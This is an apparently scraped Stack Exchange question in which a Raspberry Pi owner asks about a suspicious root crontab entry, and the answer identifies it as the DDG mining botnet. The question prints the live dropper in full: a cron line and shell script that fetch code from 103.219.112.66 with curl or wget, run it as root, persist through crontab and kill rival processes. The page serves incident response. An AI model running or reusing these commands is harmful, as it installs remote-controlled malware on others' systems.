Suspicious crontab entryHow can I kill minerd malware on an AWS EC2 instance? (compromised server)How do I add an entry to my crontab?Crontab entry with hour range going over midnightCrontab suspicious activitycrontab entry for a command to run every week and three months?Cron only occasionally sends e-mail on output and errorsSuspicious traffic in nethogs on fresh installsuspicious activity in the server?process keeps on startingHow does cron set the environment variables in /etc/cron.d/* and /etc/cron.d/?
Adding elements to some sublists of unequal length
Is there a way to make a Minor key sound "less dark"?
Does Australia produce unique 'specialty steel'?
How to temporarily replace Latin characters with Greek
How effective are nunchaku as a choking weapon?
Why did a young George Washington sign a document admitting to assassinating a French military officer?
Translation Golf XLVIII — We're sorry to see you go
5v home network
XGBoost validation for number of trees
How to discipline overeager engineer
What damaging options does a lich have while in an anti-magic field?
Why do previous versions of Debian packages vanish in the package repositories? (highly relevant for version-controlled system configuration)
What are the different ways one can refer to the home in everyday French
How to make a gift without seeming creepy?
Can you be promoted and then fired for-cause? (Performance)
Why is it so hard to land on The Moon?
Why can I ping 10.0.0.0/8 addresses from a 192.168.1.0/24 subnet?
Modify real part and leaves imaginary part unchanged
How could "aggressor" pilots fly foreign aircraft without speaking the language?
Little Endian Number to String Conversion
Closest thing to Infinity Gauntlet in DnD5e
Should I withdraw my paper because the editor is delaying the report?
How can I float a pin that otherwise should be low?
Why is matter-antimatter asymmetry surprising, if asymmetry can be generated by a random walk in which particles go into black holes?
Suspicious crontab entry
How can I kill minerd malware on an AWS EC2 instance? (compromised server)How do I add an entry to my crontab?Crontab entry with hour range going over midnightCrontab suspicious activitycrontab entry for a command to run every week and three months?Cron only occasionally sends e-mail on output and errorsSuspicious traffic in nethogs on fresh installsuspicious activity in the server?process keeps on startingHow does cron set the environment variables in /etc/cron.d/* and /etc/cron.d/?
.everyoneloves__top-leaderboard:empty,.everyoneloves__mid-leaderboard:empty,.everyoneloves__bot-mid-leaderboard:empty
margin-bottom:0;
5
I wanted to add something to my root crontab file on my Raspberry Pi, and found an entry that seems suspicious to me, searching for parts of it on Google turned up nothing.
Crontab entry:
*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh
The contents of http://103.219.112.66:8000/i.sh are:
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root
cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4
ps auxf | grep -v grep | grep xribbcb | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk 'print $2' | xargs kill -9
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -
My Linux knowledge is limited, but to me it seems that downloading binaries from an Indonesian server and running them as root regularly is not something that is usual.
What is this? What should I do?
security cron malware
asked 8 hours ago
Peter DamPeter Dam
313 bronze badges
New contributor
Peter Dam is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.
|
show 4 more comments
5
I wanted to add something to my root crontab file on my Raspberry Pi, and found an entry that seems suspicious to me, searching for parts of it on Google turned up nothing.
Crontab entry:
*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh
The contents of http://103.219.112.66:8000/i.sh are:
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root
cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4
ps auxf | grep -v grep | grep xribbcb | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk 'print $2' | xargs kill -9
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -
My Linux knowledge is limited, but to me it seems that downloading binaries from an Indonesian server and running them as root regularly is not something that is usual.
What is this? What should I do?
security cron malware
asked 8 hours ago
Peter DamPeter Dam
313 bronze badges
New contributor
Peter Dam is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.
5
It’s circular. Every 15 minutes it downloads and installs a fresh copy of itself. If/when the copy on the remote server is changed, all servers running this cronjob will execute whatever the new code is, within 15 minutes.
– Wildcard
7 hours ago
2
Is your raspberry pi open to the internet? What is your raspberry pi running? This is the only result on google when I search for xribfa4. If you are not running software that needs to do this then this is likely a virus.
– kemotep
7 hours ago
4
@kemotep that string is random, but google for the IP and it gives a few results. Something about a ddg mining botnet
– frostschutz
6 hours ago
2
I found it. Its crazy that the IP is registered to an Indonesian Government site. Also looks like there is nearly 2000 other ips delivering this payload.
– kemotep
6 hours ago
2
The main thing you must be aware of is that even if you remove that crontab entry, your system most likely still has the vulnerability that allowed it to be infected. You need to find and fix that vulnerability.
– Hans-Martin Mosner
4 hours ago
|
show 4 more comments
5
5
5
I wanted to add something to my root crontab file on my Raspberry Pi, and found an entry that seems suspicious to me, searching for parts of it on Google turned up nothing.
Crontab entry:
*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh
The contents of http://103.219.112.66:8000/i.sh are:
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root
cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4
ps auxf | grep -v grep | grep xribbcb | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk 'print $2' | xargs kill -9
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -
My Linux knowledge is limited, but to me it seems that downloading binaries from an Indonesian server and running them as root regularly is not something that is usual.
What is this? What should I do?
security cron malware
asked 8 hours ago
Peter DamPeter Dam
313 bronze badges
New contributor
Peter Dam is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.
I wanted to add something to my root crontab file on my Raspberry Pi, and found an entry that seems suspicious to me, searching for parts of it on Google turned up nothing.
Crontab entry:
*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh
The contents of http://103.219.112.66:8000/i.sh are:
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root
cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4
ps auxf | grep -v grep | grep xribbcb | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk 'print $2' | xargs kill -9
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -
My Linux knowledge is limited, but to me it seems that downloading binaries from an Indonesian server and running them as root regularly is not something that is usual.
What is this? What should I do?
security cron malware
security cron malware
asked 8 hours ago
Peter DamPeter Dam
313 bronze badges
New contributor
Peter Dam is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.
asked 8 hours ago
Peter DamPeter Dam
313 bronze badges
New contributor
Peter Dam is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.
asked 8 hours ago
Peter DamPeter Dam
313 bronze badges
New contributor
Peter Dam is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.
asked 8 hours ago
Peter DamPeter Dam
313 bronze badges
asked 8 hours ago
Peter DamPeter Dam
313 bronze badges
313 bronze badges
New contributor
Peter Dam is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.
New contributor
Peter Dam is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.
5
It’s circular. Every 15 minutes it downloads and installs a fresh copy of itself. If/when the copy on the remote server is changed, all servers running this cronjob will execute whatever the new code is, within 15 minutes.
– Wildcard
7 hours ago
2
Is your raspberry pi open to the internet? What is your raspberry pi running? This is the only result on google when I search for xribfa4. If you are not running software that needs to do this then this is likely a virus.
– kemotep
7 hours ago
4
@kemotep that string is random, but google for the IP and it gives a few results. Something about a ddg mining botnet
– frostschutz
6 hours ago
2
I found it. Its crazy that the IP is registered to an Indonesian Government site. Also looks like there is nearly 2000 other ips delivering this payload.
– kemotep
6 hours ago
2
The main thing you must be aware of is that even if you remove that crontab entry, your system most likely still has the vulnerability that allowed it to be infected. You need to find and fix that vulnerability.
– Hans-Martin Mosner
4 hours ago
|
show 4 more comments
5
It’s circular. Every 15 minutes it downloads and installs a fresh copy of itself. If/when the copy on the remote server is changed, all servers running this cronjob will execute whatever the new code is, within 15 minutes.
– Wildcard
7 hours ago
2
Is your raspberry pi open to the internet? What is your raspberry pi running? This is the only result on google when I search for xribfa4. If you are not running software that needs to do this then this is likely a virus.
– kemotep
7 hours ago
4
@kemotep that string is random, but google for the IP and it gives a few results. Something about a ddg mining botnet
– frostschutz
6 hours ago
2
I found it. Its crazy that the IP is registered to an Indonesian Government site. Also looks like there is nearly 2000 other ips delivering this payload.
– kemotep
6 hours ago
2
The main thing you must be aware of is that even if you remove that crontab entry, your system most likely still has the vulnerability that allowed it to be infected. You need to find and fix that vulnerability.
– Hans-Martin Mosner
4 hours ago
5
5
It’s circular. Every 15 minutes it downloads and installs a fresh copy of itself. If/when the copy on the remote server is changed, all servers running this cronjob will execute whatever the new code is, within 15 minutes.
– Wildcard
7 hours ago
It’s circular. Every 15 minutes it downloads and installs a fresh copy of itself. If/when the copy on the remote server is changed, all servers running this cronjob will execute whatever the new code is, within 15 minutes.
– Wildcard
7 hours ago
2
2
Is your raspberry pi open to the internet? What is your raspberry pi running? This is the only result on google when I search for xribfa4. If you are not running software that needs to do this then this is likely a virus.
– kemotep
7 hours ago
Is your raspberry pi open to the internet? What is your raspberry pi running? This is the only result on google when I search for xribfa4. If you are not running software that needs to do this then this is likely a virus.
– kemotep
7 hours ago
4
4
@kemotep that string is random, but google for the IP and it gives a few results. Something about a ddg mining botnet
– frostschutz
6 hours ago
@kemotep that string is random, but google for the IP and it gives a few results. Something about a ddg mining botnet
– frostschutz
6 hours ago
2
2
I found it. Its crazy that the IP is registered to an Indonesian Government site. Also looks like there is nearly 2000 other ips delivering this payload.
– kemotep
6 hours ago
I found it. Its crazy that the IP is registered to an Indonesian Government site. Also looks like there is nearly 2000 other ips delivering this payload.
– kemotep
6 hours ago
2
2
The main thing you must be aware of is that even if you remove that crontab entry, your system most likely still has the vulnerability that allowed it to be infected. You need to find and fix that vulnerability.
– Hans-Martin Mosner
4 hours ago
The main thing you must be aware of is that even if you remove that crontab entry, your system most likely still has the vulnerability that allowed it to be infected. You need to find and fix that vulnerability.
– Hans-Martin Mosner
4 hours ago
|
show 4 more comments
1 Answer
1
active
oldest
votes
7
It is a DDG mining botnet , how it work :
- exploiting an RCE vulnerability
- modifying the crontab
- downloading the appropriate mining program (written with go)
- starting the mining process
DDG: A Mining Botnet Aiming at Database Servers
U&L : How can I kill minerd malware on an AWS EC2 instance? (compromised server)
answered 6 hours ago
GAD3RGAD3R
31.1k19 gold badges63 silver badges124 bronze badges
1
Yeah, it actually seems that this is it. Thanks! Will mark this as an answer, if nothing new comes up.
– Peter Dam
3 hours ago
add a comment
|
Your Answer
StackExchange.ready(function()
var channelOptions =
tags: "".split(" "),
id: "106"
;
initTagRenderer("".split(" "), "".split(" "), channelOptions);
StackExchange.using("externalEditor", function()
// Have to fire editor after snippets, if snippets enabled
if (StackExchange.settings.snippets.snippetsEnabled)
StackExchange.using("snippets", function()
createEditor();
);
else
createEditor();
);
function createEditor()
StackExchange.prepareEditor(
heartbeatType: 'answer',
autoActivateHeartbeat: false,
convertImagesToLinks: false,
noModals: true,
showLowRepImageUploadWarning: true,
reputationToPostImages: null,
bindNavPrevention: true,
postfix: "",
imageUploader:
brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/4.0/"u003ecc by-sa 4.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
allowUrls: true
,
onDemand: true,
discardSelector: ".discard-answer"
,immediatelyShowMarkdownHelp:true
);
);
Peter Dam is a new contributor. Be nice, and check out our Code of Conduct.
draft saved
draft discarded
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2funix.stackexchange.com%2fquestions%2f544811%2fsuspicious-crontab-entry%23new-answer', 'question_page');
);
Post as a guest
Required, but never shown
1 Answer
1
active
oldest
votes
1 Answer
1
active
oldest
votes
active
oldest
votes
active
oldest
votes
7
It is a DDG mining botnet , how it work :
- exploiting an RCE vulnerability
- modifying the crontab
- downloading the appropriate mining program (written with go)
- starting the mining process
DDG: A Mining Botnet Aiming at Database Servers
U&L : How can I kill minerd malware on an AWS EC2 instance? (compromised server)
answered 6 hours ago
GAD3RGAD3R
31.1k19 gold badges63 silver badges124 bronze badges
1
Yeah, it actually seems that this is it. Thanks! Will mark this as an answer, if nothing new comes up.
– Peter Dam
3 hours ago
add a comment
|
7
It is a DDG mining botnet , how it work :
- exploiting an RCE vulnerability
- modifying the crontab
- downloading the appropriate mining program (written with go)
- starting the mining process
DDG: A Mining Botnet Aiming at Database Servers
U&L : How can I kill minerd malware on an AWS EC2 instance? (compromised server)
answered 6 hours ago
GAD3RGAD3R
31.1k19 gold badges63 silver badges124 bronze badges
1
Yeah, it actually seems that this is it. Thanks! Will mark this as an answer, if nothing new comes up.
– Peter Dam
3 hours ago
add a comment
|
7
7
7
It is a DDG mining botnet , how it work :
- exploiting an RCE vulnerability
- modifying the crontab
- downloading the appropriate mining program (written with go)
- starting the mining process
DDG: A Mining Botnet Aiming at Database Servers
U&L : How can I kill minerd malware on an AWS EC2 instance? (compromised server)
answered 6 hours ago
GAD3RGAD3R
31.1k19 gold badges63 silver badges124 bronze badges
It is a DDG mining botnet , how it work :
- exploiting an RCE vulnerability
- modifying the crontab
- downloading the appropriate mining program (written with go)
- starting the mining process
DDG: A Mining Botnet Aiming at Database Servers
U&L : How can I kill minerd malware on an AWS EC2 instance? (compromised server)
answered 6 hours ago
GAD3RGAD3R
31.1k19 gold badges63 silver badges124 bronze badges
edited 6 hours ago
answered 6 hours ago
GAD3RGAD3R
31.1k19 gold badges63 silver badges124 bronze badges
answered 6 hours ago
GAD3RGAD3R
31.1k19 gold badges63 silver badges124 bronze badges
answered 6 hours ago
GAD3RGAD3R
31.1k19 gold badges63 silver badges124 bronze badges
31.1k19 gold badges63 silver badges124 bronze badges
1
Yeah, it actually seems that this is it. Thanks! Will mark this as an answer, if nothing new comes up.
– Peter Dam
3 hours ago
add a comment
|
1
Yeah, it actually seems that this is it. Thanks! Will mark this as an answer, if nothing new comes up.
– Peter Dam
3 hours ago
1
1
Yeah, it actually seems that this is it. Thanks! Will mark this as an answer, if nothing new comes up.
– Peter Dam
3 hours ago
Yeah, it actually seems that this is it. Thanks! Will mark this as an answer, if nothing new comes up.
– Peter Dam
3 hours ago
add a comment
|
Peter Dam is a new contributor. Be nice, and check out our Code of Conduct.
draft saved
draft discarded
Peter Dam is a new contributor. Be nice, and check out our Code of Conduct.
Peter Dam is a new contributor. Be nice, and check out our Code of Conduct.
Peter Dam is a new contributor. Be nice, and check out our Code of Conduct.
Thanks for contributing an answer to Unix & Linux Stack Exchange!
- Please be sure to answer the question. Provide details and share your research!
But avoid …
- Asking for help, clarification, or responding to other answers.
- Making statements based on opinion; back them up with references or personal experience.
To learn more, see our tips on writing great answers.
draft saved
draft discarded
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2funix.stackexchange.com%2fquestions%2f544811%2fsuspicious-crontab-entry%23new-answer', 'question_page');
);
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
5
It’s circular. Every 15 minutes it downloads and installs a fresh copy of itself. If/when the copy on the remote server is changed, all servers running this cronjob will execute whatever the new code is, within 15 minutes.
– Wildcard
7 hours ago
2
Is your raspberry pi open to the internet? What is your raspberry pi running? This is the only result on google when I search for xribfa4. If you are not running software that needs to do this then this is likely a virus.
– kemotep
7 hours ago
4
@kemotep that string is random, but google for the IP and it gives a few results. Something about a ddg mining botnet
– frostschutz
6 hours ago
2
I found it. Its crazy that the IP is registered to an Indonesian Government site. Also looks like there is nearly 2000 other ips delivering this payload.
– kemotep
6 hours ago
2
The main thing you must be aware of is that even if you remove that crontab entry, your system most likely still has the vulnerability that allowed it to be infected. You need to find and fix that vulnerability.
– Hans-Martin Mosner
4 hours ago